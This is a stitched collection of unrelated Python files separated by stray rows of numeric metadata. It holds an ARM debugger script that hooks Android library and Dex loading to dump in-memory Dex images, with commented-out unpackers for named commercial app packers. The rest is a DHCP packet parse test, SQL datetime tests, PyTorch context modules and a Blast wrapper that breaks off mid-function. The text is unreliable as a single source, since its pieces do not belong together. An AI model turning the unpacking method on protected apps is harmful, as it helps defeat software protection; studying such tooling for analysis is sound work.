    # filter — the commented-out originals with "context" were disabled)
    execution_state.executeDSCommand("hbreak %s" % _strip(config.brk_LoadNativeLibrary))
    execution_state.executeDSCommand("hbreak %s" % _strip(config.brk_do_dlopen))
    execution_state.executeDSCommand(
        "hbreak %s context %s" % (_strip(config.brk_clock_gettime), _strip(pid)))
    # define the breakpoint scripts
    service = execution_state.getBreakpointService()
    for index in range(service.getBreakpointCount()):
        brk = service.getBreakpoint(index)
        low_addr = int(brk.getAddresses()[0]) & 0xffffffff
        if low_addr == config.brk_LoadNativeLibrary:
            script = os.path.join(config.workspace, config.script_directory, config.LoadNativeLibrary_script)
            execution_state.executeDSCommand("break-script %s %s" % (brk.getId(), script))
            brk.enable()
        if low_addr == config.brk_do_dlopen:
            script = os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
            execution_state.executeDSCommand("break-script %s %s" % (brk.getId(), script))
            brk.enable()
        if low_addr == config.brk_clock_gettime:
            script = os.path.join(config.workspace, config.script_directory, config.clock_gettime_script)
            execution_state.executeDSCommand("break-script %s %s" % (brk.getId(), script))
            brk.enable()
            # NOTE(review): enable() immediately followed by disable() —
            # looks like the breakpoint is meant to start disabled and be
            # toggled by a script later, but the enable() is then dead code;
            # confirm intent.
            brk.disable()
# ---- #
# set the analyzing environment
def setup(pid):
    """Reset the breakpoint state and install the analysis breakpoints for
    process *pid*.

    Expects exactly one breakpoint (the bootstrap one) to exist on entry.
    """
    assert execution_state.getBreakpointService().getBreakpointCount() == 1
    # remove all current breakpoints; if the bulk removal fails, fall back to
    # removing hardware breakpoints and the DexFile breakpoint individually
    try:
        debugger.removeAllBreakpoints()
    except DebugException:
        service = execution_state.getBreakpointService()
        stale = []
        for index in range(service.getBreakpointCount()):
            candidate = service.getBreakpoint(index)
            low_addr = int(candidate.getAddresses()[0]) & 0xffffffff
            if candidate.isHardware() or low_addr == config.brk_DexFile:
                stale.append(candidate)
        for candidate in stale:
            candidate.remove()
    # -- Common BRK -- #
    dex_setup(pid)
    # je_setup(pid) # ??
    # ne_setup(pid) # ??
    # linker_setup(pid) # ??
    # -- Behavior BRK -- #
    # anti_debugging(pid)
    # anti_emulator(pid)
    # anti_instrumentation(pid)
    # time_checking_setup(pid)
    # system_library_hooking_setup(pid)
    # art_object_modification_setup(pid)
    # class_modification_setup(pid)
    # -- Unpack BRK -- #
    # unpack_baidu_2018(pid)
    # unpack_bangcle_2018(pid)
    # unpack_ijiami_2018(pid)
    # unpack_kiwi_2018(pid)
    # unpack_qihoo_2018(pid)
    # unpack_tencent_2018(pid)
    # -- Evaluation BRK -- #
    # cf_bench(pid)
def retrieve_string_value(string_ptr):
    """Read a std::string at *string_ptr* from target memory and return its
    character data.

    Layout offsets come from config; the length field is read but not used
    (retrieve_char_array presumably stops at the NUL terminator — confirm).
    """
    length_val = memory.readMemory32(string_ptr + config.offset_string_length)
    data_ptr = memory.readMemory32(string_ptr + config.offset_string_reference)
    return memory.retrieve_char_array(data_ptr)
def cleanup():
    """Drop the cached MMU page table (if any) and force a garbage-collection
    pass to release the memory before resuming the target."""
    if mmu.page_table is not None:
        del mmu.page_table
    gc.collect()
# File offsets (bytes into the linker binary image) of the linker's
# find_library() and call_constructors() routines; combined with
# config.linker_base / linker_file_offset / linker_memory_offset in
# init_art() to compute run-time breakpoint addresses.
find_library_offset = 0x0000592e
call_constructors_offset = 0x00005970
def init_art():
    """ART entry point, hit when do_dlopen() loads the target OAT file.

    Reads the do_dlopen arguments, runs the target forward until the soinfo
    base/size are known, records the OAT mapping range, installs the analysis
    breakpoints via setup(), and resumes the target.
    """
    # PID of the current process, taken from CONTEXTIDR_EL1
    pid_val = int(execution_state.getVariableService().readValue(
        "$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
    # -1- read do_dlopen(name, flags, extinfo) arguments from R0-R2
    name_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
    name_val = memory.retrieve_char_array(name_ptr)
    flags_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
    extinfo_ptr = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
    if config.debug:
        print("[entrypoint] [do_dlopen] pid = %#x" % pid_val)
        print("[entrypoint] [do_dlopen] name = %s" % name_val)
        print("[entrypoint] [do_dlopen] flags_val = %#x" % flags_val)
        print("[entrypoint] [do_dlopen] extinfo_ptr = %0#10x" % extinfo_ptr)
    # the first loaded Oat file must be our target
    if not config.package_filter(name_val):
        # should not be reached
        assert False
    config.log_print("[entrypoint] [do_dlopen] pid = %#x" % pid_val)
    # -2- run to the find_library() call site and grab the soinfo pointer
    brk_find_library = (config.linker_base + find_library_offset
                        - config.linker_file_offset + config.linker_memory_offset)
    execution_state.getExecutionService().resumeTo(brk_find_library)
    try:
        execution_state.getExecutionService().waitForStop(120000)  # wait for 120s
    except DebugException:
        raise RuntimeError("wtf !!!")
    si_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
    if config.debug:
        print("[entrypoint] [do_dlopen] si = %0#10x" % si_ptr)
    base_val = memory.readMemory32(si_ptr + config.offset_soinfo_base)
    size_val = memory.readMemory32(si_ptr + config.offset_soinfo_size)
    if base_val == 0x0 or size_val == 0x0:
        # -3- mapping not populated yet: run further, to call_constructors(),
        # and re-read the soinfo fields
        brk_call_constructors = (config.linker_base + call_constructors_offset
                                 - config.linker_file_offset + config.linker_memory_offset)
        execution_state.getExecutionService().resumeTo(brk_call_constructors)
        try:
            execution_state.getExecutionService().waitForStop(120000)  # wait for 120s
        except DebugException:
            raise RuntimeError("wtf !!!")
        base_val = memory.readMemory32(si_ptr + config.offset_soinfo_base)
        size_val = memory.readMemory32(si_ptr + config.offset_soinfo_size)
    if config.debug:
        print("[entrypoint] [do_dlopen] si->base = %0#10x" % base_val)
        print("[entrypoint] [do_dlopen] si->size = %#x" % size_val)
    config.log_print("[entrypoint] [do_dlopen] name = %s, si->base = %0#10x, si->size = %#x"
                     % (name_val, base_val, size_val))
    if not base_val == 0x0:
        config.save_range_info(base_val, base_val + size_val - 0x1)
    # initialization
    setup(pid_val)
    # continue the execution of the target application
    execution_state.getExecutionService().resume()
    cleanup()
    return
def init_dvm():
    """DexFile entry point, hit when the target Dex file is constructed.

    Reads the DexFile constructor arguments (begin_, size_, location_),
    installs the analysis breakpoints via setup(), dumps the in-memory Dex
    image to the workspace, and resumes the target.
    """
    # PID of the current process, taken from CONTEXTIDR_EL1
    pid_val = int(execution_state.getVariableService().readValue(
        "$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
    # DexFile* in R0, then begin_, size_, location_ in R1-R3
    dex_file_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
    begin_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
    size_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
    location_ptr = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff
    # location_ is a std::string; pull out its character data
    location_val = retrieve_string_value(location_ptr)
    if config.debug:
        print("[entrypoint] [DexFile] pid = %#x" % pid_val)
        print("[entrypoint] [DexFile] begin_ = %0#10x" % begin_val)
        print("[entrypoint] [DexFile] size_ = %#x" % size_val)
        print("[entrypoint] [DexFile] location_ = %s" % location_val)
    # the first loaded Dex file must be our target
    if not config.package_filter(location_val):
        # should not be reached
        assert False
    config.log_print("[DexFile] pid = %#x" % pid_val)
    config.log_print("[DexFile] begin_ = %0#10x, size_ = %#x, location_ = %s"
                     % (begin_val, size_val, location_val))
    # initialization
    setup(pid_val)
    # dump the in-memory DexFile, named after the last path component
    dump_path = os.path.join(config.workspace, config.dex_directory,
                             location_val.split("/")[-1])
    memory.dump(dump_path, "binary", begin_val, begin_val + size_val - 0x1)
    # continue the execution of the target application
    execution_state.getExecutionService().resume()
    cleanup()
    return
# ---- #
if __name__ == '__main__':
    # Dispatch on runtime flavour: ART and DVM targets hook different
    # entry points (do_dlopen vs. the DexFile constructor).
    if config.art:
        init_art()
    if config.dvm:
        init_dvm()
    sys.exit()
| 53.399116
| 210
| 0.719014
| 4,340
| 36,258
| 5.718894
| 0.063594
| 0.053666
| 0.106366
| 0.029009
| 0.825786
| 0.771636
| 0.738114
| 0.725947
| 0.706487
| 0.703666
| 0
| 0.010366
| 0.135253
| 36,258
| 678
| 211
| 53.477876
| 0.78124
| 0.272243
| 0
| 0.506925
| 0
| 0.00277
| 0.06853
| 0.005724
| 0.171745
| 0
| 0.018466
| 0
| 0.00831
| 0
| null | null | 0.016621
| 0.024931
| null | null | 0.041551
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b5818d1d11026f85b9a92a7c3b5c27305406f48
| 4,106
|
py
|
Python
|
nox/src/nox/lib/packet/t/dhcp_parse_test.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 28
|
2015-02-04T13:59:25.000Z
|
2021-12-29T03:44:47.000Z
|
nox/src/nox/lib/packet/t/dhcp_parse_test.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 552
|
2015-01-05T18:25:54.000Z
|
2022-03-16T18:51:13.000Z
|
nox/src/nox/lib/packet/t/dhcp_parse_test.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 25
|
2015-02-04T18:48:20.000Z
|
2020-06-18T15:51:05.000Z
|
# Copyright 2008 (C) Nicira, Inc.
#
# This file is part of NOX.
#
# NOX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# NOX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NOX. If not, see <http://www.gnu.org/licenses/>.
import array
from nox.lib.packet.ethernet import *
from nox.coreapps.testharness.testdefs import *
large_dhcp = \
"""\
\xff\xff\xff\xff\xff\xff\x00\x1d\x09\x21\x7f\x14\x08\x00\x45\x00\
\x02\x40\x00\x00\x00\x00\x40\x11\x78\xae\x00\x00\x00\x00\xff\xff\
\xff\xff\x00\x44\x00\x43\x02\x2c\x5e\xe2\x01\x01\x06\x00\x95\x14\
\xf7\x2d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x1d\x09\x21\x7f\x14\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x63\x82\x53\x63\x35\x01\x01\x3d\x07\x01\
\x00\x1d\x09\x21\x7f\x14\x3c\x06\x75\x64\x68\x63\x70\x20\x37\x07\
\x01\x03\x06\x0c\x0f\x1c\x2c\xff\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
"""
def test_fullDHCPPacket():
    """Parse the canned DHCP discover frame and check every fixed-header
    field of the decoded dhcp layer."""
    # NOTE(review): `import array` at the top of the file binds the *module*;
    # this bare `array('B', ...)` call only resolves if one of the wildcard
    # imports re-exports the array class — verify.
    eth = ethernet(array('B', large_dhcp))
    udph = eth.find('udp')    # parsed but not asserted here
    iph = eth.find('ipv4')    # parsed but not asserted here
    dhcph = eth.find('dhcp')
    nox_test_assert(dhcph, 'dhcp')
    # fixed DHCP header fields expected for this capture
    expected_fields = [
        ('op', 1), ('htype', 1), ('hlen', 6), ('hops', 0),
        ('xid', 0x9514f72d), ('secs', 0), ('flags', 0),
        ('ciaddr', 0), ('yiaddr', 0), ('siaddr', 0), ('giaddr', 0),
    ]
    for attr, value in expected_fields:
        nox_test_assert(getattr(dhcph, attr) == value, 'dhcp')
    nox_test_assert(array_to_octstr(dhcph.chaddr[:6]) == '00:1d:09:21:7f:14', 'dhcp')
    nox_test_assert(len(dhcph.parsedOptions.keys()) == 4, 'dhcp')
| 48.305882
| 85
| 0.711154
| 846
| 4,106
| 3.41253
| 0.193853
| 1.047454
| 1.555594
| 2.053343
| 0.678559
| 0.621406
| 0.52061
| 0.52061
| 0.52061
| 0.52061
| 0
| 0.311985
| 0.083536
| 4,106
| 84
| 86
| 48.880952
| 0.455222
| 0.156844
| 0
| 0
| 0
| 0
| 0.084746
| 0
| 0
| 1
| 0.00997
| 0
| 0.608696
| 1
| 0.043478
| false
| 0
| 0.130435
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c87f108dd05d21922d67355913c72e948f3aa69b
| 119
|
py
|
Python
|
virtual/lib/python3.8/site-packages/wtforms/widgets/__init__.py
|
Esther-Anyona/mylearner
|
d49d1c4c8dbeb93cc384f2037c48236be5dc89e1
|
[
"MIT"
] | 1,197
|
2015-01-04T16:17:55.000Z
|
2022-03-28T01:14:33.000Z
|
venv/lib/python3.10/site-packages/wtforms/widgets/__init__.py
|
superiorkid/rbac
|
40f45849687075bc46a52985af22eab6cf83cbda
|
[
"MIT"
] | 517
|
2015-01-03T13:36:25.000Z
|
2022-03-27T07:02:07.000Z
|
venv/lib/python3.10/site-packages/wtforms/widgets/__init__.py
|
superiorkid/rbac
|
40f45849687075bc46a52985af22eab6cf83cbda
|
[
"MIT"
] | 449
|
2015-01-02T12:17:36.000Z
|
2022-02-17T06:41:34.000Z
|
from wtforms.widgets.core import *
from wtforms.widgets.core import html_params
from wtforms.widgets.core import Input
| 29.75
| 44
| 0.840336
| 18
| 119
| 5.5
| 0.444444
| 0.333333
| 0.545455
| 0.666667
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10084
| 119
| 3
| 45
| 39.666667
| 0.925234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
c8fc940d78f2d5ab329be7a0052f6633e914b3fa
| 4,525
|
py
|
Python
|
sql/tests/ast/test_datetime.py
|
AprilXiaoyanLiu/whitenoise-system
|
0e94d2cc8114b97a61d5d2e45278428f91f1e687
|
[
"MIT"
] | 63
|
2020-03-26T15:26:10.000Z
|
2020-10-22T06:26:38.000Z
|
sql/tests/ast/test_datetime.py
|
AprilXiaoyanLiu/whitenoise-system
|
0e94d2cc8114b97a61d5d2e45278428f91f1e687
|
[
"MIT"
] | 87
|
2021-02-20T20:43:49.000Z
|
2022-03-31T16:24:46.000Z
|
sql/tests/ast/test_datetime.py
|
AprilXiaoyanLiu/whitenoise-system
|
0e94d2cc8114b97a61d5d2e45278428f91f1e687
|
[
"MIT"
] | 17
|
2021-02-18T18:47:09.000Z
|
2022-03-01T06:44:17.000Z
|
import datetime
from snsql.sql.parse import QueryParser
import calendar
class TestDateTime:
    """Round-trip and evaluation tests for SQL date/time expressions."""

    def _eval(self, frag):
        # Parse *frag*, check it serializes back to the same text
        # (ignoring whitespace), then evaluate it against an empty row.
        expr = QueryParser().parse_expression(frag)
        assert(frag.replace(' ', '') == str(expr).replace(' ', ''))
        return expr.evaluate({})

    def test_cur_date(self):
        assert(isinstance(self._eval("CURRENT_DATE"), datetime.date))

    def test_cur_time(self):
        assert(isinstance(self._eval("CURRENT_TIME"), datetime.time))

    def test_cur_timestamp(self):
        assert(isinstance(self._eval("CURRENT_TIMESTAMP"), datetime.datetime))

    def test_extract_0(self):
        # a bare date has no seconds component -> 0
        assert(self._eval("EXTRACT(SECOND FROM '2017-05-20')") == 0)

    def test_extract_null(self):
        # a bare time has no day component -> None
        assert(self._eval("EXTRACT(DAY FROM '09:15:07')") is None)

    def test_extract_second(self):
        assert(self._eval("EXTRACT(SECOND FROM '2017-05-20 09:15:07')") == 7)

    def test_extract_day(self):
        assert(self._eval("EXTRACT(DAY FROM '2017-05-20')") == 20)

    def test_extract_year(self):
        assert(self._eval("EXTRACT(YEAR FROM CURRENT_DATE)") > 2020)

    def test_extract_month(self):
        assert(self._eval("EXTRACT(MONTH FROM '2017-05-20')") == 5)

    def test_extract_seconds(self):
        assert(self._eval("EXTRACT(SECOND FROM '09:15:07')") == 7)

    def test_extract_minutes(self):
        assert(self._eval("EXTRACT(MINUTE FROM '09:15:07')") == 15)

    def test_extract_hours(self):
        assert(self._eval("EXTRACT(HOUR FROM '09:15:07')") == 9)

    def test_extract_weekday(self):
        # 2017-05-20 was a Saturday (weekday 5)
        assert(self._eval("EXTRACT(WEEKDAY FROM '2017-05-20')") == 5)

    def test_extract_micro_date(self):
        assert(self._eval("EXTRACT(MICROSECOND FROM '2017-05-20')") == 0)

    def test_extract_micro_time_no_micro(self):
        assert(self._eval("EXTRACT(MICROSECOND FROM '09:12:32')") == 0)

    def test_extract_micro(self):
        assert(self._eval("EXTRACT(MICROSECOND FROM CURRENT_TIMESTAMP)") > 0)

    def test_day_name(self):
        assert(self._eval("DAYNAME('2017-05-20 09:15:07')") == calendar.day_name[5])
| 41.898148
| 67
| 0.563094
| 509
| 4,525
| 4.886051
| 0.115914
| 0.047849
| 0.136711
| 0.205066
| 0.803378
| 0.770004
| 0.743868
| 0.743868
| 0.725372
| 0.725372
| 0
| 0.034574
| 0.252155
| 4,525
| 107
| 68
| 42.28972
| 0.700355
| 0
| 0
| 0.54717
| 0
| 0
| 0.12
| 0
| 0
| 0
| 0
| 0
| 0.320755
| 1
| 0.160377
| false
| 0
| 0.028302
| 0
| 0.198113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cda701589e29630f1886cf82afce6b7be13aae28
| 62
|
py
|
Python
|
asana_random_one_on_one/__init__.py
|
flychain-us/random-one-on-one
|
bb6d673d800ceb92b2bde103fc267e25fdc88ee8
|
[
"MIT"
] | 4
|
2021-05-14T18:42:10.000Z
|
2021-05-19T20:18:19.000Z
|
asana_random_one_on_one/__init__.py
|
flychain-us/random-one-on-one
|
bb6d673d800ceb92b2bde103fc267e25fdc88ee8
|
[
"MIT"
] | null | null | null |
asana_random_one_on_one/__init__.py
|
flychain-us/random-one-on-one
|
bb6d673d800ceb92b2bde103fc267e25fdc88ee8
|
[
"MIT"
] | 2
|
2021-06-27T09:34:14.000Z
|
2021-11-08T02:23:56.000Z
|
from asana_random_one_on_one.asana_random_one_on_one import *
| 31
| 61
| 0.903226
| 12
| 62
| 4
| 0.5
| 0.458333
| 0.583333
| 0.666667
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 62
| 1
| 62
| 62
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
cddcd08ce5d2c731378ba425e6520d55bc1a7264
| 3,818
|
py
|
Python
|
lib/modules/context_module.py
|
Inovasyon-ve-Analiz/uacanet
|
4f6567840360ece53868888acd72a16de8279dc2
|
[
"MIT"
] | 57
|
2021-07-07T06:13:03.000Z
|
2022-03-29T10:20:30.000Z
|
lib/modules/context_module.py
|
Inovasyon-ve-Analiz/uacanet
|
4f6567840360ece53868888acd72a16de8279dc2
|
[
"MIT"
] | 9
|
2021-07-17T10:46:52.000Z
|
2022-03-10T15:00:57.000Z
|
lib/modules/context_module.py
|
Inovasyon-ve-Analiz/uacanet
|
4f6567840360ece53868888acd72a16de8279dc2
|
[
"MIT"
] | 17
|
2021-07-08T04:52:19.000Z
|
2022-03-19T13:33:48.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import *
class simple_context(nn.Module):
    """Multi-dilation context block: four parallel conv branches
    (1x1 plus 3x3 at dilations 3/5/7) fused by a 3x3 conv, with a 1x1
    residual projection added on top."""

    def __init__(self, in_channel, out_channel):
        super(simple_context, self).__init__()
        self.branch0 = conv(in_channel, out_channel, 1)
        self.branch1 = conv(in_channel, out_channel, 3, dilation=3)
        self.branch2 = conv(in_channel, out_channel, 3, dilation=5)
        self.branch3 = conv(in_channel, out_channel, 3, dilation=7)
        self.conv_cat = conv(4 * out_channel, out_channel, 3, relu=True)
        self.conv_res = conv(in_channel, out_channel, 1)

    def forward(self, x):
        # run all branches on the same input and fuse along channels
        branch_outs = [self.branch0(x), self.branch1(x),
                       self.branch2(x), self.branch3(x)]
        fused = self.conv_cat(torch.cat(branch_outs, dim=1))
        return fused + self.conv_res(x)
class RFB_kernel(nn.Module):
    """One RFB branch: 1x1 reduce, separable 1xK / Kx1 convs, then a 3x3
    conv dilated by the receptive size."""

    def __init__(self, in_channel, out_channel, receptive_size=3):
        super(RFB_kernel, self).__init__()
        self.conv0 = conv(in_channel, out_channel, 1)
        self.conv1 = conv(out_channel, out_channel, kernel_size=(1, receptive_size))
        self.conv2 = conv(out_channel, out_channel, kernel_size=(receptive_size, 1))
        self.conv3 = conv(out_channel, out_channel, 3, dilation=receptive_size)

    def forward(self, x):
        # straight pipeline through the four stages
        for stage in (self.conv0, self.conv1, self.conv2, self.conv3):
            x = stage(x)
        return x
class RFB(nn.Module):
    """Receptive Field Block: a 1x1 branch plus three RFB_kernel branches
    (receptive sizes 3/5/7), concatenated, fused by a 3x3 conv, residual
    1x1 projection added, then ReLU."""

    def __init__(self, in_channel, out_channel):
        super(RFB, self).__init__()
        self.relu = nn.ReLU(True)
        self.branch0 = conv(in_channel, out_channel, 1)
        self.branch1 = RFB_kernel(in_channel, out_channel, 3)
        self.branch2 = RFB_kernel(in_channel, out_channel, 5)
        self.branch3 = RFB_kernel(in_channel, out_channel, 7)
        self.conv_cat = conv(4 * out_channel, out_channel, 3)
        self.conv_res = conv(in_channel, out_channel, 1)

    def forward(self, x):
        branch_outs = tuple(branch(x) for branch in
                            (self.branch0, self.branch1, self.branch2, self.branch3))
        fused = self.conv_cat(torch.cat(branch_outs, 1))
        return self.relu(fused + self.conv_res(x))
class PAA_kernel(nn.Module):
    """Parallel-axial-attention kernel: 1x1 reduce, separable 1xK / Kx1
    convs, horizontal + vertical self-attention summed, then a dilated
    3x3 conv."""

    def __init__(self, in_channel, out_channel, receptive_size=3):
        super(PAA_kernel, self).__init__()
        self.conv0 = conv(in_channel, out_channel, 1)
        self.conv1 = conv(out_channel, out_channel, kernel_size=(1, receptive_size))
        self.conv2 = conv(out_channel, out_channel, kernel_size=(receptive_size, 1))
        self.conv3 = conv(out_channel, out_channel, 3, dilation=receptive_size)
        self.Hattn = self_attn(out_channel, mode='h')
        self.Wattn = self_attn(out_channel, mode='w')

    def forward(self, x):
        for stage in (self.conv0, self.conv1, self.conv2):
            x = stage(x)
        # axial attention along both spatial axes, fused by addition
        attended = self.Hattn(x) + self.Wattn(x)
        return self.conv3(attended)
class PAA_e(nn.Module):
    """PAA encoder block: a 1x1 branch plus three PAA_kernel branches
    (receptive sizes 3/5/7), concatenated, fused by a 3x3 conv, residual
    1x1 projection added, then ReLU."""

    def __init__(self, in_channel, out_channel):
        super(PAA_e, self).__init__()
        self.relu = nn.ReLU(True)
        self.branch0 = conv(in_channel, out_channel, 1)
        self.branch1 = PAA_kernel(in_channel, out_channel, 3)
        self.branch2 = PAA_kernel(in_channel, out_channel, 5)
        self.branch3 = PAA_kernel(in_channel, out_channel, 7)
        self.conv_cat = conv(4 * out_channel, out_channel, 3)
        self.conv_res = conv(in_channel, out_channel, 1)

    def forward(self, x):
        branch_outs = tuple(branch(x) for branch in
                            (self.branch0, self.branch1, self.branch2, self.branch3))
        fused = self.conv_cat(torch.cat(branch_outs, 1))
        return self.relu(fused + self.conv_res(x))
| 33.787611
| 84
| 0.624935
| 571
| 3,818
| 3.908932
| 0.105079
| 0.188172
| 0.236111
| 0.187276
| 0.875896
| 0.845878
| 0.837814
| 0.787634
| 0.711022
| 0.711022
| 0
| 0.035389
| 0.252488
| 3,818
| 112
| 85
| 34.089286
| 0.746671
| 0
| 0
| 0.613636
| 0
| 0
| 0.000524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113636
| false
| 0
| 0.045455
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b57417a6eaadfbddffb05f8802552dac9787749e
| 8,854
|
py
|
Python
|
pyrpct/Blast.py
|
KingoftheNight/pyrpct
|
ec2f8ee6cc27cb7d5a3d5ddd2f86f802c09f485d
|
[
"BSD-2-Clause"
] | null | null | null |
pyrpct/Blast.py
|
KingoftheNight/pyrpct
|
ec2f8ee6cc27cb7d5a3d5ddd2f86f802c09f485d
|
[
"BSD-2-Clause"
] | null | null | null |
pyrpct/Blast.py
|
KingoftheNight/pyrpct
|
ec2f8ee6cc27cb7d5a3d5ddd2f86f802c09f485d
|
[
"BSD-2-Clause"
] | null | null | null |
# import packages
import os
import subprocess
import time
from Visual import visual_longcommand_linux, visual_longcommand_windows
blast_path = os.path.dirname(__file__)
# make database
def blast_makedb_linux(file, out):
    """Build a protein BLAST database named *out* (under blastDB/) from the
    FASTA file *file*, using the system `makeblastdb`."""
    db_dir = os.path.join(blast_path, 'blastDB')
    # NOTE(review): shell=True with string concatenation — paths containing
    # spaces or shell metacharacters will break or inject; prefer a list
    # argv with shell=False.
